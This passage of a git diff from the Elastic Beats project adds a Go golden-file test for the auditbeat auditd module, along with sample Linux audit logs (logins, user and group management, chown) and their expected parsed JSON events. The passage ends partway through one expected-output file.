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" } diff --git a/auditbeat/module/auditd/golden_files_test.go b/auditbeat/module/auditd/golden_files_test.go new file mode 100644 index 000000000000..adea47816127 --- /dev/null +++ b/auditbeat/module/auditd/golden_files_test.go @@ -0,0 +1,225 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// +build linux + +package auditd + +import ( + "bufio" + "context" + "encoding/json" + "flag" + "io/ioutil" + "os" + "os/user" + "path/filepath" + "strings" + "testing" + "time" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/go-libaudit/v2" + "github.com/elastic/go-libaudit/v2/aucoalesce" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/metricbeat/mb" + mbtest "github.com/elastic/beats/v7/metricbeat/mb/testing" +) + +const ( + testDir = "testdata" + testExt = ".log" + testPattern = "*" + testExt + goldenSuffix = "-expected.json" + goldenPattern = testPattern + goldenSuffix + fileTimeout = 3 * time.Minute + terminator = "type=TEST msg=audit(0.0:585): msg=\"terminate\"" +) + +var ( + update = flag.Bool("update", false, "update golden data") + + knownUsers = []user.User{ + {Username: "vagrant", Uid: "1000"}, + {Username: "alice", Uid: "1001"}, + {Username: "oldbob", Uid: "1002"}, + {Username: "charlie", Uid: "1003"}, + {Username: "testuser", Uid: "1004"}, + {Username: "bob", Uid: "9999"}, + } + + knownGroups = []user.Group{ + {Name: "vagrant", Gid: "1000"}, + {Name: "alice", Gid: "1001"}, + {Name: "oldbob", Gid: "1002"}, + {Name: "charlie", Gid: "1003"}, + {Name: "testgroup", Gid: "1004"}, + {Name: "bob", Gid: "9999"}, + } +) + +func readLines(path string) (lines []string, err error) { + f, err := os.Open(path) + if err != nil { + return nil, err + } + defer f.Close() + scanner := bufio.NewScanner(f) + for scanner.Scan() { + lines = append(lines, scanner.Text()) + } + return lines, scanner.Err() +} + +func readGoldenFile(t testing.TB, path string) (events []common.MapStr) { + data, err := ioutil.ReadFile(path) + if err != nil { + t.Fatalf("can't read golden file '%s': %v", path, err) + } + if err = json.Unmarshal(data, &events); err != nil { + t.Fatalf("error decoding JSON from golden file '%s': %v", path, err) + } + return +} + +func normalize(t testing.TB, events []mb.Event) (norm []common.MapStr) { + for _, ev := range events { + var output common.MapStr + data, err := json.Marshal(ev.BeatEvent(moduleName, metricsetName).Fields) + if err != nil { + t.Fatal(err) + } + json.Unmarshal(data, &output) + norm = append(norm, output) + } + return norm +} + +func configForGolden() map[string]interface{} { + return map[string]interface{}{ + "module": "auditd", + "failure_mode": "log", + "socket_type": "unicast", + "include_warnings": true, + "include_raw_message": true, + "resolve_ids": true, + "stream_buffer_consumers": 1, + } +} + +type TerminateFn func(mb.Event) bool +type terminableReporter struct { + events []mb.Event + ctx context.Context + cancel context.CancelFunc + err error + isLast TerminateFn +} + +func (r *terminableReporter) Event(event mb.Event) bool { + if r.ctx.Err() != nil { + return false + } + if r.isLast(event) { + r.cancel() + return false + } + r.events = append(r.events, event) + return true +} + +func (r *terminableReporter) Error(err error) bool { + if r.ctx.Err() != nil && r.err != nil { + r.err = err + r.cancel() + } + return true +} + +func (r *terminableReporter) Done() <-chan struct{} { + return r.ctx.Done() +} + +func runTerminableReporter(timeout time.Duration, ms mb.PushMetricSetV2, isLast TerminateFn) []mb.Event { + ctx, cancel := context.WithTimeout(context.Background(), timeout) + reporter := terminableReporter{ + ctx: ctx, + cancel: cancel, + isLast: isLast, + } + go ms.Run(&reporter) + <-ctx.Done() + return reporter.events +} + +func isTestEvent(event mb.Event) bool { + mt, ok := event.ModuleFields["message_type"] + return ok && mt == "test" +} + +func TestGoldenFiles(t *testing.T) { + // Add testing users and groups to test with resolve_ids enabled. + aucoalesce.HardcodeUsers(knownUsers...) + aucoalesce.HardcodeGroups(knownGroups...) + + sourceFiles, err := filepath.Glob(filepath.Join(testDir, testPattern)) + if err != nil { + t.Fatal(err) + } + + for _, file := range sourceFiles { + testName := strings.TrimSuffix(filepath.Base(file), testExt) + t.Run(testName, func(t *testing.T) { + lines, err := readLines(file) + if err != nil { + t.Fatalf("error reading log file '%s': %v", file, err) + } + mock := NewMock(). + // Get Status response for initClient + returnACK().returnStatus(). + // Send expected ACKs for initialization + returnACK().returnACK().returnACK().returnACK().returnACK(). + // Send audit messages + returnMessage(lines...). + // Send stream terminator + returnMessage(terminator) + + ms := mbtest.NewPushMetricSetV2(t, configForGolden()) + auditMetricSet := ms.(*MetricSet) + auditMetricSet.client.Close() + auditMetricSet.client = &libaudit.AuditClient{Netlink: mock} + mbEvents := runTerminableReporter(fileTimeout, ms, isTestEvent) + t.Logf("Received %d events for %d audit records", len(mbEvents), len(lines)) + assertNoErrors(t, mbEvents) + events := normalize(t, mbEvents) + goldenPath := file + goldenSuffix + if *update { + data, err := json.MarshalIndent(events, "", " ") + if err != nil { + t.Fatal(err) + } + if err = ioutil.WriteFile(goldenPath, data, 0644); err != nil { + t.Fatalf("failed writing golden file '%s': %v", goldenPath, err) + } + } + golden := readGoldenFile(t, goldenPath) + assert.EqualValues(t, golden, events) + }) + } +} diff --git a/auditbeat/module/auditd/testdata/auditlogin.log b/auditbeat/module/auditd/testdata/auditlogin.log new file mode 100644 index 000000000000..6cc3de721f02 --- /dev/null +++ b/auditbeat/module/auditd/testdata/auditlogin.log @@ -0,0 +1,3 @@ +type=LOGIN msg=audit(1611244872.857:1414): pid=27681 uid=0 old-auid=4294967295 auid=1000 tty=(none) old-ses=4294967295 ses=58 res=1 +type=LOGIN msg=audit(1611244909.293:1465): pid=27768 uid=0 old-auid=1000 auid=1001 tty=pts2 old-ses=58 ses=59 res=1 +type=LOGIN msg=audit(1234877011.799:7734): login pid=26125 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=1172 diff --git a/auditbeat/module/auditd/testdata/auditlogin.log-expected.json b/auditbeat/module/auditd/testdata/auditlogin.log-expected.json new file mode 100644 index 000000000000..c2bd2506e813 --- /dev/null +++ b/auditbeat/module/auditd/testdata/auditlogin.log-expected.json @@ -0,0 +1,183 @@ +[ + { + "auditd": { + "data": { + "old-ses": "4294967295", + "tty": "(none)" + }, + "message_type": "login", + "result": "success", + "sequence": 1414, + "session": "58", + "summary": { + "actor": { + "primary": "unset", + "secondary": "root" + }, + "object": { + "primary": "1000", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-login-id-to", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=LOGIN msg=audit(1611244872.857:1414): pid=27681 uid=0 old-auid=4294967295 auid=1000 tty=(none) old-ses=4294967295 ses=58 res=1" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 27681 + }, + "related": { + "user": [ + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "1000", + "name": "vagrant" + } + } + }, + { + "auditd": { + "data": { + "old-ses": "58", + "tty": "pts2" + }, + "message_type": "login", + "result": "success", + "sequence": 1465, + "session": "59", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "object": { + "primary": "1001", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-login-id-to", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=LOGIN msg=audit(1611244909.293:1465): pid=27768 uid=0 old-auid=1000 auid=1001 tty=pts2 old-ses=58 ses=59 res=1" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 27768 + }, + "related": { + "user": [ + "alice", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1001", + "name": "alice" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1000", + "name": "vagrant", + "old-auid": { + "id": "1000", + "name": "vagrant" + } + } + }, + { + "auditd": { + "data": { + "new_ses": "1172", + "old_ses": "4294967295" + }, + "message_type": "login", + "result": "unknown", + "sequence": 7734, + "session": "", + "summary": { + "actor": { + "primary": "4294967295", + "secondary": "root" + }, + "object": { + "primary": "0", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-login-id-to", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=LOGIN msg=audit(1234877011.799:7734): login pid=26125 uid=0 old auid=4294967295 new auid=0 old ses=4294967295 new ses=1172" + ], + "outcome": "unknown", + "type": [ + "start" + ] + }, + "process": { + "pid": 26125 + }, + "related": { + "user": [ + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "effective": { + "id": "0", + "name": "root" + }, + "new_auid": { + "id": "0", + "name": "root" + }, + "old_auid": { + "id": "4294967295" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/centos7.log b/auditbeat/module/auditd/testdata/centos7.log new file mode 100644 index 000000000000..a17b4b0c7fd0 --- /dev/null +++ b/auditbeat/module/auditd/testdata/centos7.log @@ -0,0 +1,8 @@ +type=USER_START msg=audit(1610992796.780:425): pid=10174 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="vagrant" exe="/usr/sbin/sshd" hostname=10.0.2.2 addr=10.0.2.2 terminal=ssh res=success' +type=ADD_GROUP msg=audit(1610992959.555:463): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-group acct="bob" exe="/usr/sbin/useradd" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success' +type=ADD_USER msg=audit(1610992959.558:464): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-user id=1002 exe="/usr/sbin/useradd" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054112.528:629): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-primary-group id=1002 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054112.538:631): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=1002 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054337.523:639): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-uid id=9999 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054337.530:641): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-mail-file-owner id=9999 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' +type=USER_MGMT msg=audit(1611054337.531:642): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=9999 exe="/usr/sbin/usermod" hostname=localhost.localdomain addr=? terminal=pts/1 res=success' diff --git a/auditbeat/module/auditd/testdata/centos7.log-expected.json b/auditbeat/module/auditd/testdata/centos7.log-expected.json new file mode 100644 index 000000000000..8df1f7943f83 --- /dev/null +++ b/auditbeat/module/auditd/testdata/centos7.log-expected.json @@ -0,0 +1,621 @@ +[ + { + "auditd": { + "data": { + "acct": "vagrant", + "grantors": "pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog", + "hostname": "10.0.2.2", + "op": "PAM:session_open", + "terminal": "ssh" + }, + "message_type": "user_start", + "result": "success", + "sequence": 425, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "/usr/sbin/sshd", + "object": { + "primary": "ssh", + "secondary": "10.0.2.2", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610992796.780:425): pid=10174 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct=\"vagrant\" exe=\"/usr/sbin/sshd\" hostname=10.0.2.2 addr=10.0.2.2 terminal=ssh res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/sbin/sshd", + "pid": 10174 + }, + "related": { + "user": [ + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "10.0.2.2" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "sshd_t", + "level": "s0-s0", + "role": "system_r", + "user": "system_u" + } + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost.localdomain", + "op": "add-group", + "terminal": "pts/1" + }, + "message_type": "add_group", + "result": "success", + "sequence": 463, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/useradd", + "object": { + "primary": "bob", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610992959.555:463): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-group acct=\"bob\" exe=\"/usr/sbin/useradd\" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "9999", + "name": "bob" + }, + "process": { + "executable": "/usr/sbin/useradd", + "pid": 10246 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "localhost.localdomain", + "id": "1002", + "op": "add-user", + "terminal": "pts/1" + }, + "message_type": "add_user", + "result": "success", + "sequence": 464, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/useradd", + "object": { + "primary": "1002", + "type": "account" + } + } + }, + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_USER msg=audit(1610992959.558:464): pid=10246 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=add-user id=1002 exe=\"/usr/sbin/useradd\" hostname=localhost.localdomain addr=127.0.0.1 terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "creation" + ] + }, + "process": { + "executable": "/usr/sbin/useradd", + "pid": 10246 + }, + "related": { + "user": [ + "oldbob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "1002", + "name": "oldbob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "1002", + "op": "changing-primary-group", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 629, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "oldbob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054112.528:629): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-primary-group id=1002 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20839 + }, + "related": { + "user": [ + "oldbob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "1002", + "name": "oldbob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "1002", + "op": "updating-home-dir-owner", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 631, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "oldbob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054112.538:631): pid=20839 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=1002 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20839 + }, + "related": { + "user": [ + "oldbob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "1002", + "name": "oldbob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "9999", + "op": "changing-uid", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 639, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054337.523:639): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=changing-uid id=9999 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20862 + }, + "related": { + "user": [ + "bob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "9999", + "name": "bob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "9999", + "op": "updating-mail-file-owner", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 641, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054337.530:641): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-mail-file-owner id=9999 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20862 + }, + "related": { + "user": [ + "bob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "9999", + "name": "bob" + } + } + }, + { + "auditd": { + "data": { + "hostname": "localhost.localdomain", + "id": "9999", + "op": "updating-home-dir-owner", + "terminal": "pts/1" + }, + "message_type": "user_mgmt", + "result": "success", + "sequence": 642, + "session": "3", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/1", + "secondary": "localhost.localdomain", + "type": "user-session" + } + } + }, + "event": { + "action": "modified-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_MGMT msg=audit(1611054337.531:642): pid=20862 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=updating-home-dir-owner id=9999 exe=\"/usr/sbin/usermod\" hostname=localhost.localdomain addr=? terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 20862 + }, + "related": { + "user": [ + "bob", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + }, + "target": { + "id": "9999", + "name": "bob" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/chown.log b/auditbeat/module/auditd/testdata/chown.log new file mode 100644 index 000000000000..88995214e368 --- /dev/null +++ b/auditbeat/module/auditd/testdata/chown.log @@ -0,0 +1,4 @@ +type=SYSCALL msg=audit(1611091464.740:263): arch=c000003e syscall=260 success=yes exit=0 a0=ffffffffffffff9c a1=12d6210 a2=3e9 a3=ffffffff items=1 ppid=9492 pid=9494 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=8 comm="chown" exe="/usr/bin/chown" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=CWD msg=audit(1611091464.740:263): cwd="/home/vagrant" +type=PATH msg=audit(1611091464.740:263): item=0 name="test" inode=921833 dev=fd:02 mode=0100664 ouid=9999 ogid=1000 rdev=00:00 obj=unconfined_u:object_r:user_home_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0 +type=PROCTITLE msg=audit(1611091464.740:263): proctitle=63686F776E002D5200616C6963650074657374 diff --git a/auditbeat/module/auditd/testdata/chown.log-expected.json b/auditbeat/module/auditd/testdata/chown.log-expected.json new file mode 100644 index 000000000000..502ff7b51b59 --- /dev/null +++ b/auditbeat/module/auditd/testdata/chown.log-expected.json @@ -0,0 +1,134 @@ +[ + { + "auditd": { + "data": { + "a0": "ffffffffffffff9c", + "a1": "12d6210", + "a2": "3e9", + "a3": "ffffffff", + "arch": "x86_64", + "exit": "0", + "syscall": "fchownat", + "tty": "pts2" + }, + "message_type": "syscall", + "paths": [ + { + "cap_fe": "0", + "cap_fi": "0000000000000000", + "cap_fp": "0000000000000000", + "cap_fver": "0", + "dev": "fd:02", + "inode": "921833", + "item": "0", + "mode": "0100664", + "name": "test", + "obj_domain": "user_home_t", + "obj_level": "s0", + "obj_role": "object_r", + "obj_user": "unconfined_u", + "objtype": "NORMAL", + "ogid": 